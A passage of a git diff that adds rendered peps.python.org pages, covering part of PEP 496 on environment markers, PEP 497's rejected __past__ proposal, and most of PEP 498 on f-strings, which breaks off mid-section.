Environment markers were first specified in PEP 345. PEP 426 +(which would replace PEP 345) proposed extensions to the markers. +When 2.7.10 was released, even these extensions became insufficient due to +their reliance on simple lexical comparisons, and thus this PEP has been born.

+
+
+

Rationale

+

Many Python packages are written with portability in mind.

+

For many packages this means they aim to support a wide range of +Python releases. If they depend on libraries such as argparse - +which started as external libraries, but later got incorporated into +core - specifying a single set of requirements is difficult, as the +set of required packages differs depending on the version of Python in +use.

+

For other packages, designing for portability means supporting +multiple operating systems. However, the significant differences +between them may mean that particular dependencies are only needed on +particular platforms (relying on pywin32 only on Windows, for +example)”

+

Environment Markers attempt to provide more flexibility in a list of +requirements by allowing the developer to list requirements that are +specific to a particular environment.

+
+
+

Examples

+

Here are some examples of such markers inside a requirements.txt:

+
pywin32 >=1.0 ; sys_platform == 'win32'
+unittest2 >=2.0,<3.0 ; python_version == '2.4' or python_version == '2.5'
+backports.ssl_match_hostname >= 3.4 ; python_version < '2.7.9' or (python_version >= '3.0' and python_version < '3.4')
+
+
+

And here’s an example of some conditional metadata included in +setup.py for a distribution that requires PyWin32 both at runtime and +buildtime when using Windows:

+
setup(
+  install_requires=["pywin32 > 1.0 : sys.platform == 'win32'"],
+  setup_requires=["pywin32 > 1.0 : sys.platform == 'win32'"]
+  )
+
+
+
+
+

Micro-language

+

The micro-language behind this is as follows. It compares:

+
    +
  • strings with the == and in operators (and their opposites)
  • +
  • version numbers with the <, <=, >=, and < operators +in addition to those supported for strings
  • +
+

The usual boolean operators and and or can be used to combine +expressions, and parentheses are supported for grouping.

+

The pseudo-grammar is

+
MARKER: EXPR [(and|or) EXPR]*
+EXPR: ("(" MARKER ")") | (STREXPR|VEREXPR)
+STREXPR: STRING [STRCMPOP STREXPR]
+STRCMPOP: ==|!=|in|not in
+VEREXPR: VERSION [VERCMPOP VEREXPR]
+VERCMPOP: (==|!=|<|>|<=|>=)
+
+
+

SUBEXPR is either a Python string (such as 'win32') or one of +the Strings marker variables listed below.

+

VEREXPR is a PEP 440 version identifier, or one of the +Version number marker variables listed below. Comparisons between +version numbers are done using PEP 440 semantics.

+
+

Strings

+
    +
  • os_name: os.name
  • +
  • sys_platform: sys.platform
  • +
  • platform_release: platform.release()
  • +
  • implementation_name: sys.implementation.name
  • +
  • platform_machine: platform.machine()
  • +
  • platform_python_implementation: platform.python_implementation()
  • +
+

If a particular string value is not available (such as sys.implementation.name +in versions of Python prior to 3.3), the corresponding marker +variable MUST be considered equivalent to the empty string.

+

If a particular version number value is not available (such as +sys.implementation.version in versions of Python prior to 3.3) the +corresponding marker variable MUST be considered equivalent to 0

+
+
+

Version numbers

+
    +
  • python_version: platform.python_version()[:3]
  • +
  • python_full_version: see definition below
  • +
  • platform_version: platform.version()
  • +
  • implementation_version: see definition below
  • +
+

The python_full_version and implementation_version marker variables +are derived from sys.version_info and sys.implementation.version +respectively, in accordance with the following algorithm:

+
def format_full_version(info):
+    version = '{0.major}.{0.minor}.{0.micro}'.format(info)
+    kind = info.releaselevel
+    if kind != 'final':
+        version += kind[0] + str(info.serial)
+    return version
+
+python_full_version = format_full_version(sys.version_info)
+implementation_version = format_full_version(sys.implementation.version)
+
+
+

python_full_version will typically correspond to sys.version.split()[0].

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0496.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0497/index.html b/pep-0497/index.html new file mode 100644 index 00000000000..9aa87df4f4b --- /dev/null +++ b/pep-0497/index.html @@ -0,0 +1,401 @@ + + + + + + + + PEP 497 – A standard mechanism for backward compatibility | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 497 – A standard mechanism for backward compatibility

+
+
Author:
+
Ed Schofield <ed at pythoncharmers.com>
+
PEP-Delegate:
+
Brett Cannon <brett at python.org>
+
Status:
+
Rejected
+
Type:
+
Process
+
Created:
+
04-Aug-2015
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

The steering council decided that the __past__ aspect of this proposal +was too complicated for the potential benefit. The other aspect of stronger +requirements for backwards-compatibility should be addressed by PEP 387.

+
+
+

Scope

+

This PEP is complementary to PEPs 5, 236, and 387, and shares similar +goals.

+

This PEP explains the need for an additional compatibility mechanism +in support of PEP 5, “Guidelines for Language Evolution”. PEP 236, +“Back to the __future__”, introduced a mechanism for forward +compatibility in support of PEP 5 but noted that a new mechanism for +backward compatibility was outside the scope of that PEP. A related +PEP (in progress) introduces such a mechanism for backward +compatibility.

+

PEP 5, “Guidelines for Language Evolution”, notes that “This PEP [PEP 5] +does not replace or preclude other compatibility strategies such as +dynamic loading of backwards-compatible parsers.”

+
+
+

Context

+

From PEP 236: “From time to time, Python makes an incompatible change +to the advertised semantics of core language constructs, or changes +their accidental (implementation-dependent) behavior in some way. +While this is never done capriciously, and is always done with the aim +of improving the language over the long term, over the short term it’s +contentious and disrupting. PEP 5, Guidelines for Language Evolution, +suggests ways to ease the pain, and this PEP [PEP 236] introduces some +machinery in support of that.”

+

Also from PEP 236: “The purpose of future_statement is to make life +easier for people who keep current with the latest release in a timely +fashion. We don’t hate you if you don’t, but your problems are much +harder to solve, and somebody with those problems will need to write a +PEP addressing them. future_statement is aimed at a different +audience.”

+
+
+

The current situation

+

When an incompatible change to core language syntax or semantics is +being made, Python currently provides the future_statement mechanism +for providing forward compatibility until the release that enforces +the new syntax or semantics, but provides no corresponding standard +mechanism for providing backward compatibility after this release.

+
+
+

Problem

+

A consequence of this asymmetry is that, with respect to a breaking +change, the older (pre-breaking) version of the Python interpreter is +more capable than the newer (breaking) version; the older interpreter +can use both code designed prior to the change and newer code, whereas +the newer interpreter is only capable of using code that has been +upgraded to support the changed feature.

+

As an example, consider the changes to the division operator +introduced in PEP 238 in 2001, soon after PEP 236 introduced the +future_statement mechanism. PEP 238 outlines a suite of useful +forward-compatibility mechanisms for “true division” in the Python 2.x +series but omits to include any backward-compatibility mechanisms for +after “true division” was first enforced in Python 3.0. Python versions +since 3.0 do not provide a backward compatibility mechanism such as +from __past__ import division for code that expects the old +“classic division” semantics, whereas Python versions prior to 3.0 do +support both “classic division” code and also forward compatibility +with code expecting “true division”. A further consequence of this is +that the “most compatible” interpreter with respect to the variety of +division-related Python code in the wild is Python 2.7, the version +before the breaking change was first enforced.

+
+
+

Backward compatibility as enabler for “downhill upgrades”

+

In contrast to this situation, newer versions of application software +such as office suites tend to be more capable than earlier versions +with respect to their support for loading different versions of their +data file formats. The pattern is usually that the newer application +versions can transparently load data from either their newer or their +older data formats, and that the newer version defaults to saving data +in the newer format. Newer application software versions tend to be +backward-compatible by default. Forward compatibility is relatively +rare.

+

This policy puts the user of the newer application software at an +advantage over the user of the older software, which is usually +incapable of loading data in the newer format. Sometimes it is +possible for a user of a newer software application version to export +data in an older version by choosing this option explicitly. In these +cases, the forward-compatibility this enables may or may not be +perfect; some features may be missing or the results may be otherwise +suboptimal. Upgrading is therefore easy, whereas downgrading is +harder.

+

The emergent behaviour over many users from such a policy of new +attractive features plus backward compatibility features is that a +natural pressure builds up on each individual user to upgrade his or +her own application version, and, the more other users an individual +exchanges data files with, the more acute this pressure becomes.

+
+
+

Proposal - part 1

+

This PEP makes two specific, related proposals. The first is that:

+
+
PEP 5 be augmented with a 6th step in the section “Steps for +Introducing Backwards-Incompatible Features” to indicate that, when an +incompatible change to core language syntax or semantics is being +made, Python-dev’s policy is to prefer and expect that, wherever +possible, a mechanism for backward compatibility be considered and +provided for future Python versions after the breaking change is +adopted by default, in addition to any mechanisms proposed for forward +compatibility such as new future_statements. Furthermore, PEP 387, +“Backwards Compatibility Policy” (if accepted) would be +augmented with the same 6th step.
+
+

Example

+

As an example of how this PEP is to be applied, if the latest revision +of the “true division” PEP (238) were proposed today, it would be +considered incomplete. PEP 238 notes the “severe backwards +compatibility issues” raised by the proposal and describes several +measures for forward compatibility in the Abstract and API Changes +sections. It also mentions some backward compatibility ideas raised on +c.l.py, including “Use from __past__ import division to use +classic division semantics in a module”, but it does not put forward +any backward compatibility plan as part of the proposal.

+

If this PEP is accepted, it would be expected that a proposal such as +PEP 238, because of its large-scale compatibility implications, would +also be accompanied by a backward compatibility plan that enables +users of future Python versions after the breaking change has come +into effect to re-enable the classic division behaviour easily in +their code.

+
+
+
+

Proposal - part 2

+

The second proposal is that:

+
+
Python provide a standard backward compatibility mechanism in +parallel to the __future__ module mechanism for forward +compatibility.
+

For reference, this document will refer to this as a “__past__” +mechanism hereon, although it need not have all the characteristics +of the __future__ module and future_statement mechanism.

+

The specific form and implementation of the __past__ mechanism is +the subject of a separate PEP (in progress). However, this PEP +recommends that this __past__ mechanism be designed to meet +similar criteria to those outlined in PEP 296 for __future__. +Specifically:

+

a. It should enable individual modules to specify obsolete behaviours +to re-enable from older Python versions on a module-by-module basis.

+

b. It should be flexible enough for both Python 3.6+ and point +releases of earlier versions to reintroduce backward compatibility +with older Python syntax or semantics for user modules that invoke the +__past__ mechanism.

+

c. It should be possible to run older code augmented to invoke +__past__ behaviours on older Python versions such as 2.x that have +no knowledge of the specific __past__ features invoked, or even +that the __past__ mechanism for backward-compatibility exists.

+
+

Counter-examples

+

Some implementations of __past__ mechanisms that would violate +these criteria are:

+

a. Import hooks. These would normally fail to work on a +module-by-module basis; instead they apply recursively to all new +modules imported from within a module.

+

b. A new piece of syntax or new semantics for Python 3.6 that is +incompatible with prior versions.

+

c. A function added in Python 3.6 to a module in the Python standard +library that exists under the same name in prior Python versions.

+
+
+
+

Benefits

+

The benefit to Python-dev of adopting this proposal is that future +backward-incompatible changes can be less disruptive if these changes +each have a corresponding __past__ feature that has been +implemented and can be invoked easily by users of future Python +versions. This can help the language to evolve more quickly and more +effectively to correct for design mistakes.

+

The benefit to conservative users is obvious: they can add support for +the latest shiny compatibility-breaking Python version to their code +merely by adding a __past__ incantation (perhaps a single line) to +each module, and that this can be automated. They can then upgrade +their interpreter to the latest version and gain access to the latest +shiny Python features.

+

The benefit to the community is that, if ten thousand users rely on +package XYZ, and package XYZ can trivially add support for the latest +Python version, those ten thousand users can also upgrade to the +latest Python version quickly, without being held back waiting for +package XYZ to do this.

+
+
+

Questions and answers

+

Q1: Does this PEP require that Python keep two possible sets of semantics +for each backward-incompatible feature forever?

+

A1: Definitely not. Legacy features can still be phased out when +appropriate – that is, when the majority of the user-base has +migrated to the newer Python version. This PEP merely proposes to +shift the emphasis of the development effort directed at compatibility +from 100% forwards to at least 50% backwards. Backwards compatibility +is the more powerful of the two concepts for allowing a user-base to +adopt the latest Python interpreter version.

+

Notice that it has been a long time since most users have cared about +backwards compatibility for non-nested scopes, because most users have +moved comfortably past Python 2.1.

+

Q2: But Python-dev is already overwhelmed and doesn’t have the +bandwidth to implement / maintain the additional complexity!

+

A2: Python-dev can ask the community of developers to step up and +maintain backward compatibility in Python for legacy language features +they care about. When the community stops caring about a particular +obsolete behaviour, Python-dev can stop caring too.

+

The __past__ mechanism could possibly be designed to be extensible +by the community, e.g. as a standard but “blessed” PyPI package, to +reduce the load on the core developers.

+

Q3: Won’t backward compatibility features lead to lots of cruft and +bloat and baggage in Python?

+

A3: Not necessarily. First, proposals for new compatibility-breaking +features in Python could be evaluated partly on the simplicity and +maintainability of the implementation of their associated __past__ +feature up-front.

+

Second, some old features are simple to provide backward compatibility +for. Consider the “classic division” behaviour before Python 3.0. The +python-future project contains a compatible implementation of +classic division in the function future.utils.old_div:

+
def old_div(a, b):
+    """
+    Equivalent to ``a / b`` on Python 2 without ``from __future__ import
+    division``.
+    """
+    if isinstance(a, numbers.Integral) and isinstance(b, numbers.Integral):
+        return a // b
+    else:
+        return a / b
+
+
+

Bundling such a function with Python 3.x versions, together with +a simple mechanism to invoke it for every appearance of a +/ b after an appropriate __past__ invocation, need not be +onerous.

+

Q4: What about performance? Won’t the performance of newer Python +versions suffer under the weight of legacy features?

+

A4: This can be evaluated on a case-by-case basis. The major potential +concern is that the performance with the new default behaviour does +not suffer unduly because of the presence of the legacy option. The +performance under the influence of the __past__ invocation is of +secondary importance.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0497.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0498/index.html b/pep-0498/index.html new file mode 100644 index 00000000000..ee4cee0a45f --- /dev/null +++ b/pep-0498/index.html @@ -0,0 +1,891 @@ + + + + + + + + PEP 498 – Literal String Interpolation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 498 – Literal String Interpolation

+
+
Author:
+
Eric V. Smith <eric at trueblade.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
01-Aug-2015
+
Python-Version:
+
3.6
+
Post-History:
+
07-Aug-2015, 30-Aug-2015, 04-Sep-2015, 19-Sep-2015, 06-Nov-2016
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Python supports multiple ways to format text strings. These include +%-formatting [1], str.format() [2], and string.Template +[3]. Each of these methods have their advantages, but in addition +have disadvantages that make them cumbersome to use in practice. This +PEP proposed to add a new string formatting mechanism: Literal String +Interpolation. In this PEP, such strings will be referred to as +“f-strings”, taken from the leading character used to denote such +strings, and standing for “formatted strings”.

+

This PEP does not propose to remove or deprecate any of the existing +string formatting mechanisms.

+

F-strings provide a way to embed expressions inside string literals, +using a minimal syntax. It should be noted that an f-string is really +an expression evaluated at run time, not a constant value. In Python +source code, an f-string is a literal string, prefixed with ‘f’, which +contains expressions inside braces. The expressions are replaced with +their values. Some examples are:

+
>>> import datetime
+>>> name = 'Fred'
+>>> age = 50
+>>> anniversary = datetime.date(1991, 10, 12)
+>>> f'My name is {name}, my age next year is {age+1}, my anniversary is {anniversary:%A, %B %d, %Y}.'
+'My name is Fred, my age next year is 51, my anniversary is Saturday, October 12, 1991.'
+>>> f'He said his name is {name!r}.'
+"He said his name is 'Fred'."
+
+
+

A similar feature was proposed in PEP 215. PEP 215 proposed to support +a subset of Python expressions, and did not support the type-specific +string formatting (the __format__() method) which was introduced +with PEP 3101.

+
+
+

Rationale

+

This PEP is driven by the desire to have a simpler way to format +strings in Python. The existing ways of formatting are either error +prone, inflexible, or cumbersome.

+

%-formatting is limited as to the types it supports. Only ints, strs, +and doubles can be formatted. All other types are either not +supported, or converted to one of these types before formatting. In +addition, there’s a well-known trap where a single value is passed:

+
>>> msg = 'disk failure'
+>>> 'error: %s' % msg
+'error: disk failure'
+
+
+

But if msg were ever to be a tuple, the same code would fail:

+
>>> msg = ('disk failure', 32)
+>>> 'error: %s' % msg
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: not all arguments converted during string formatting
+
+
+

To be defensive, the following code should be used:

+
>>> 'error: %s' % (msg,)
+"error: ('disk failure', 32)"
+
+
+

str.format() was added to address some of these problems with +%-formatting. In particular, it uses normal function call syntax (and +therefore supports multiple parameters) and it is extensible through +the __format__() method on the object being converted to a +string. See PEP 3101 for a detailed rationale. This PEP reuses much of +the str.format() syntax and machinery, in order to provide +continuity with an existing Python string formatting mechanism.

+

However, str.format() is not without its issues. Chief among them +is its verbosity. For example, the text value is repeated here:

+
>>> value = 4 * 20
+>>> 'The value is {value}.'.format(value=value)
+'The value is 80.'
+
+
+

Even in its simplest form there is a bit of boilerplate, and the value +that’s inserted into the placeholder is sometimes far removed from +where the placeholder is situated:

+
>>> 'The value is {}.'.format(value)
+'The value is 80.'
+
+
+

With an f-string, this becomes:

+
>>> f'The value is {value}.'
+'The value is 80.'
+
+
+

F-strings provide a concise, readable way to include the value of +Python expressions inside strings.

+

In this sense, string.Template and %-formatting have similar +shortcomings to str.format(), but also support fewer formatting +options. In particular, they do not support the __format__ +protocol, so that there is no way to control how a specific object is +converted to a string, nor can it be extended to additional types that +want to control how they are converted to strings (such as Decimal +and datetime). This example is not possible with +string.Template:

+
>>> value = 1234
+>>> f'input={value:#06x}'
+'input=0x04d2'
+
+
+

And neither %-formatting nor string.Template can control +formatting such as:

+
>>> date = datetime.date(1991, 10, 12)
+>>> f'{date} was on a {date:%A}'
+'1991-10-12 was on a Saturday'
+
+
+
+

No use of globals() or locals()

+

In the discussions on python-dev [4], a number of solutions where +presented that used locals() and globals() or their equivalents. All +of these have various problems. Among these are referencing variables +that are not otherwise used in a closure. Consider:

+
>>> def outer(x):
+...     def inner():
+...         return 'x={x}'.format_map(locals())
+...     return inner
+...
+>>> outer(42)()
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+  File "<stdin>", line 3, in inner
+KeyError: 'x'
+
+
+

This returns an error because the compiler has not added a reference +to x inside the closure. You need to manually add a reference to x in +order for this to work:

+
>>> def outer(x):
+...     def inner():
+...         x
+...         return 'x={x}'.format_map(locals())
+...     return inner
+...
+>>> outer(42)()
+'x=42'
+
+
+

In addition, using locals() or globals() introduces an information +leak. A called routine that has access to the callers locals() or +globals() has access to far more information than needed to do the +string interpolation.

+

Guido stated [5] that any solution to better string interpolation +would not use locals() or globals() in its implementation. (This does +not forbid users from passing locals() or globals() in, it just +doesn’t require it, nor does it allow using these functions under the +hood.)

+
+
+
+

Specification

+

In source code, f-strings are string literals that are prefixed by the +letter ‘f’ or ‘F’. Everywhere this PEP uses ‘f’, ‘F’ may also be +used. ‘f’ may be combined with ‘r’ or ‘R’, in either order, to produce +raw f-string literals. ‘f’ may not be combined with ‘b’: this PEP does +not propose to add binary f-strings. ‘f’ may not be combined with ‘u’.

+

When tokenizing source files, f-strings use the same rules as normal +strings, raw strings, binary strings, and triple quoted strings. That +is, the string must end with the same character that it started with: +if it starts with a single quote it must end with a single quote, etc. +This implies that any code that currently scans Python code looking +for strings should be trivially modifiable to recognize f-strings +(parsing within an f-string is another matter, of course).

+

Once tokenized, f-strings are parsed in to literal strings and +expressions. Expressions appear within curly braces '{' and +'}'. While scanning the string for expressions, any doubled +braces '{{' or '}}' inside literal portions of an f-string are +replaced by the corresponding single brace. Doubled literal opening +braces do not signify the start of an expression. A single closing +curly brace '}' in the literal portion of a string is an error: +literal closing curly braces must be doubled '}}' in order to +represent a single closing brace.

+

The parts of the f-string outside of braces are literal +strings. These literal portions are then decoded. For non-raw +f-strings, this includes converting backslash escapes such as +'\n', '\"', "\'", '\xhh', '\uxxxx', +'\Uxxxxxxxx', and named unicode characters '\N{name}' into +their associated Unicode characters [6].

+

Backslashes may not appear anywhere within expressions. Comments, +using the '#' character, are not allowed inside an expression.

+

Following each expression, an optional type conversion may be +specified. The allowed conversions are '!s', '!r', or +'!a'. These are treated the same as in str.format(): '!s' +calls str() on the expression, '!r' calls repr() on the +expression, and '!a' calls ascii() on the expression. These +conversions are applied before the call to format(). The only +reason to use '!s' is if you want to specify a format specifier +that applies to str, not to the type of the expression.

+

F-strings use the same format specifier mini-language as str.format. +Similar to str.format(), optional format specifiers maybe be +included inside the f-string, separated from the expression (or the +type conversion, if specified) by a colon. If a format specifier is +not provided, an empty string is used.

+

So, an f-string looks like:

+
f ' <text> { <expression> <optional !s, !r, or !a> <optional : format specifier> } <text> ... '
+
+
+

The expression is then formatted using the __format__ protocol, +using the format specifier as an argument. The resulting value is +used when building the value of the f-string.

+

Note that __format__() is not called directly on each value. The +actual code uses the equivalent of type(value).__format__(value, +format_spec), or format(value, format_spec). See the +documentation of the builtin format() function for more details.

+

Expressions cannot contain ':' or '!' outside of strings or +parentheses, brackets, or braces. The exception is that the '!=' +operator is allowed as a special case.

+
+

Escape sequences

+

Backslashes may not appear inside the expression portions of +f-strings, so you cannot use them, for example, to escape quotes +inside f-strings:

+
>>> f'{\'quoted string\'}'
+  File "<stdin>", line 1
+SyntaxError: f-string expression part cannot include a backslash
+
+
+

You can use a different type of quote inside the expression:

+
>>> f'{"quoted string"}'
+'quoted string'
+
+
+

Backslash escapes may appear inside the string portions of an +f-string.

+

Note that the correct way to have a literal brace appear in the +resulting string value is to double the brace:

+
>>> f'{{ {4*10} }}'
+'{ 40 }'
+>>> f'{{{4*10}}}'
+'{40}'
+
+
+

Like all raw strings in Python, no escape processing is done for raw +f-strings:

+
>>> fr'x={4*10}\n'
+'x=40\\n'
+
+
+

Due to Python’s string tokenizing rules, the f-string +f'abc {a['x']} def' is invalid. The tokenizer parses this as 3 +tokens: f'abc {a[', x, and ']} def'. Just like regular +strings, this cannot be fixed by using raw strings. There are a number +of correct ways to write this f-string: with a different quote +character:

+
f"abc {a['x']} def"
+
+
+

Or with triple quotes:

+
f'''abc {a['x']} def'''
+
+
+
+
+

Code equivalence

+

The exact code used to implement f-strings is not specified. However, +it is guaranteed that any embedded value that is converted to a string +will use that value’s __format__ method. This is the same +mechanism that str.format() uses to convert values to strings.

+

For example, this code:

+
f'abc{expr1:spec1}{expr2!r:spec2}def{expr3}ghi'
+
+
+

Might be evaluated as:

+
'abc' + format(expr1, spec1) + format(repr(expr2), spec2) + 'def' + format(expr3) + 'ghi'
+
+
+
+
+

Expression evaluation

+

The expressions that are extracted from the string are evaluated in +the context where the f-string appeared. This means the expression has +full access to local and global variables. Any valid Python expression +can be used, including function and method calls.

+

Because the f-strings are evaluated where the string appears in the +source code, there is no additional expressiveness available with +f-strings. There are also no additional security concerns: you could +have also just written the same expression, not inside of an +f-string:

+
>>> def foo():
+...   return 20
+...
+>>> f'result={foo()}'
+'result=20'
+
+
+

Is equivalent to:

+
>>> 'result=' + str(foo())
+'result=20'
+
+
+

Expressions are parsed with the equivalent of ast.parse('(' + +expression + ')', '<fstring>', 'eval') [7].

+

Note that since the expression is enclosed by implicit parentheses +before evaluation, expressions can contain newlines. For example:

+
>>> x = 0
+>>> f'''{x
+... +1}'''
+'1'
+
+>>> d = {0: 'zero'}
+>>> f'''{d[0
+... ]}'''
+'zero'
+
+
+
+
+

Format specifiers

+

Format specifiers may also contain evaluated expressions. This allows +code such as:

+
>>> width = 10
+>>> precision = 4
+>>> value = decimal.Decimal('12.34567')
+>>> f'result: {value:{width}.{precision}}'
+'result:      12.35'
+
+
+

Once expressions in a format specifier are evaluated (if necessary), +format specifiers are not interpreted by the f-string evaluator. Just +as in str.format(), they are merely passed in to the +__format__() method of the object being formatted.

+
+
+

Concatenating strings

+

Adjacent f-strings and regular strings are concatenated. Regular +strings are concatenated at compile time, and f-strings are +concatenated at run time. For example, the expression:

+
>>> x = 10
+>>> y = 'hi'
+>>> 'a' 'b' f'{x}' '{c}' f'str<{y:^4}>' 'd' 'e'
+
+
+

yields the value:

+
'ab10{c}str< hi >de'
+
+
+

While the exact method of this run time concatenation is unspecified, +the above code might evaluate to:

+
'ab' + format(x) + '{c}' + 'str<' + format(y, '^4') + '>de'
+
+
+

Each f-string is entirely evaluated before being concatenated to +adjacent f-strings. That means that this:

+
>>> f'{x' f'}'
+
+
+

Is a syntax error, because the first f-string does not contain a +closing brace.

+
+
+

Error handling

+

Either compile time or run time errors can occur when processing +f-strings. Compile time errors are limited to those errors that can be +detected when scanning an f-string. These errors all raise +SyntaxError.

+

Unmatched braces:

+
>>> f'x={x'
+  File "<stdin>", line 1
+SyntaxError: f-string: expecting '}'
+
+
+

Invalid expressions:

+
>>> f'x={!x}'
+  File "<stdin>", line 1
+SyntaxError: f-string: empty expression not allowed
+
+
+

Run time errors occur when evaluating the expressions inside an +f-string. Note that an f-string can be evaluated multiple times, and +work sometimes and raise an error at other times:

+
>>> d = {0:10, 1:20}
+>>> for i in range(3):
+...     print(f'{i}:{d[i]}')
+...
+0:10
+1:20
+Traceback (most recent call last):
+  File "<stdin>", line 2, in <module>
+KeyError: 2
+
+
+

or:

+
>>> for x in (32, 100, 'fifty'):
+...   print(f'x = {x:+3}')
+...
+'x = +32'
+'x = +100'
+Traceback (most recent call last):
+  File "<stdin>", line 2, in <module>
+ValueError: Sign not allowed in string format specifier
+
+
+
+
+

Leading and trailing whitespace in expressions is ignored

+

For ease of readability, leading and trailing whitespace in +expressions is ignored. This is a by-product of enclosing the +expression in parentheses before evaluation.

+
+
+

Evaluation order of expressions

+

The expressions in an f-string are evaluated in left-to-right +order. This is detectable only if the expressions have side effects:

+
>>> def fn(l, incr):
+...    result = l[0]
+...    l[0] += incr
+...    return result
+...
+>>> lst = [0]
+>>> f'{fn(lst,2)} {fn(lst,3)}'
+'0 2'
+>>> f'{fn(lst,2)} {fn(lst,3)}'
+'5 7'
+>>> lst
+[10]
+
+
+
+
+
+

Discussion

+
+

python-ideas discussion

+

Most of the discussions on python-ideas [8] focused on three issues:

+
    +
  • How to denote f-strings,
  • +
  • How to specify the location of expressions in f-strings, and
  • +
  • Whether to allow full Python expressions.
  • +
+
+

How to denote f-strings

+

Because the compiler must be involved in evaluating the expressions +contained in the interpolated strings, there must be some way to +denote to the compiler which strings should be evaluated. This PEP +chose a leading 'f' character preceding the string literal. This +is similar to how 'b' and 'r' prefixes change the meaning of +the string itself, at compile time. Other prefixes were suggested, +such as 'i'. No option seemed better than the other, so 'f' +was chosen.

+

Another option was to support special functions, known to the +compiler, such as Format(). This seems like too much magic for +Python: not only is there a chance for collision with existing +identifiers, the PEP author feels that it’s better to signify the +magic with a string prefix character.

+
+
+

How to specify the location of expressions in f-strings

+

This PEP supports the same syntax as str.format() for +distinguishing replacement text inside strings: expressions are +contained inside braces. There were other options suggested, such as +string.Template’s $identifier or ${expression}.

+

While $identifier is no doubt more familiar to shell scripters and +users of some other languages, in Python str.format() is heavily +used. A quick search of Python’s standard library shows only a handful +of uses of string.Template, but hundreds of uses of +str.format().

+

Another proposed alternative was to have the substituted text between +\{ and } or between \{ and \}. While this syntax would +probably be desirable if all string literals were to support +interpolation, this PEP only supports strings that are already marked +with the leading 'f'. As such, the PEP is using unadorned braces +to denoted substituted text, in order to leverage end user familiarity +with str.format().

+
+
+

Supporting full Python expressions

+

Many people on the python-ideas discussion wanted support for either +only single identifiers, or a limited subset of Python expressions +(such as the subset supported by str.format()). This PEP supports +full Python expressions inside the braces. Without full expressions, +some desirable usage would be cumbersome. For example:

+
>>> f'Column={col_idx+1}'
+>>> f'number of items: {len(items)}'
+
+
+

would become:

+
>>> col_number = col_idx+1
+>>> f'Column={col_number}'
+>>> n_items = len(items)
+>>> f'number of items: {n_items}'
+
+
+

While it’s true that very ugly expressions could be included in the +f-strings, this PEP takes the position that such uses should be +addressed in a linter or code review:

+
>>> f'mapping is { {a:b for (a, b) in ((1, 2), (3, 4))} }'
+'mapping is {1: 2, 3: 4}'
+
+
+
+
+
+

Similar support in other languages

+

Wikipedia has a good discussion of string interpolation in other +programming languages [9]. This feature is implemented in many +languages, with a variety of syntaxes and restrictions.

+
+
+

Differences between f-string and str.format expressions

+

There is one small difference between the limited expressions allowed +in str.format() and the full expressions allowed inside +f-strings. The difference is in how index lookups are performed. In +str.format(), index values that do not look like numbers are +converted to strings:

+
>>> d = {'a': 10, 'b': 20}
+>>> 'a={d[a]}'.format(d=d)
+'a=10'
+
+
+

Notice that the index value is converted to the string 'a' when it +is looked up in the dict.

+

However, in f-strings, you would need to use a literal for the value +of 'a':

+
>>> f'a={d["a"]}'
+'a=10'
+
+
+

This difference is required because otherwise you would not be able to +use variables as index values:

+
>>> a = 'b'
+>>> f'a={d[a]}'
+'a=20'
+
+
+

See [10] for a further discussion. It was this observation that led to +full Python expressions being supported in f-strings.

+

Furthermore, the limited expressions that str.format() understands +need not be valid Python expressions. For example:

+
>>> '{i[";]}'.format(i={'";':4})
+'4'
+
+
+

For this reason, the str.format() “expression parser” is not suitable +for use when implementing f-strings.

+
+
+

Triple-quoted f-strings

+

Triple quoted f-strings are allowed. These strings are parsed just as +normal triple-quoted strings are. After parsing and decoding, the +normal f-string logic is applied, and __format__() is called on +each value.

+
+
+

Raw f-strings

+

Raw and f-strings may be combined. For example, they could be used to +build up regular expressions:

+
>>> header = 'Subject'
+>>> fr'{header}:\s+'
+'Subject:\\s+'
+
+
+

In addition, raw f-strings may be combined with triple-quoted strings.

+
+
+

No binary f-strings

+

For the same reason that we don’t support bytes.format(), you may +not combine 'f' with 'b' string literals. The primary problem +is that an object’s __format__() method may return Unicode data that +is not compatible with a bytes string.

+

Binary f-strings would first require a solution for +bytes.format(). This idea has been proposed in the past, most +recently in PEP 461. The discussions of such a feature usually +suggest either

+
    +
  • adding a method such as __bformat__() so an object can control +how it is converted to bytes, or
  • +
  • having bytes.format() not be as general purpose or extensible +as str.format().
  • +
+

Both of these remain as options in the future, if such functionality +is desired.

+
+
+

!s, !r, and !a are redundant

+

The !s, !r, and !a conversions are not strictly +required. Because arbitrary expressions are allowed inside the +f-strings, this code:

+
>>> a = 'some string'
+>>> f'{a!r}'
+"'some string'"
+
+
+

Is identical to:

+
>>> f'{repr(a)}'
+"'some string'"
+
+
+

Similarly, !s can be replaced by calls to str() and !a by +calls to ascii().

+

However, !s, !r, and !a are supported by this PEP in order +to minimize the differences with str.format(). !s, !r, and +!a are required in str.format() because it does not allow the +execution of arbitrary expressions.

+
+
+

Lambdas inside expressions

+

Because lambdas use the ':' character, they cannot appear outside +of parentheses in an expression. The colon is interpreted as the start +of the format specifier, which means the start of the lambda +expression is seen and is syntactically invalid. As there’s no +practical use for a plain lambda in an f-string expression, this is +not seen as much of a limitation.

+

If you feel you must use lambdas, they may be used inside of parentheses:

+
>>> f'{(lambda x: x*2)(3)}'
+'6'
+
+
+
+
+

Can’t combine with ‘u’

+

